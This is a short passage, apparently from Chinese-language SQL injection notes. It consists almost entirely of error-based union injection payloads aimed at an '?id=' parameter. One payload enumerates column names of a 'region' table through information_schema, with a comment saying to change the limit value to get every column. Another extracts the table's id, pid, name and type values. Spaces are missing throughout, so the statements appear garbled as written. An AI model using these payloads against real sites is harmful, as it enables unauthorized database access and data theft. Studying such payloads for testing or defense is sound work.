//整体语句?id=1unionselect(select1from(selectcount(*),concat((select concat(0x7e,column_name,0x7e)from information_schema.columnswhere table_name='region'limit0,1),floor(rand(0)*2))x from information_schema.tablesgroupby x)a)//替换limit的值,获得全部列名称
获得字段值
//payload(select concat(0x7e,id,0x7e,pid,0x7e,name,0x7e,type,0x7e)from region limit0,1)
//整体语句?id=1unionselect(select1from(selectcount(*),concat((select concat(0x7e,id,0x7e,pid,0x7e,name,0x7e,type,0x7e)from region limit0,1),floor(rand(0)*2))x from information_schema.tablesgroupby x)a)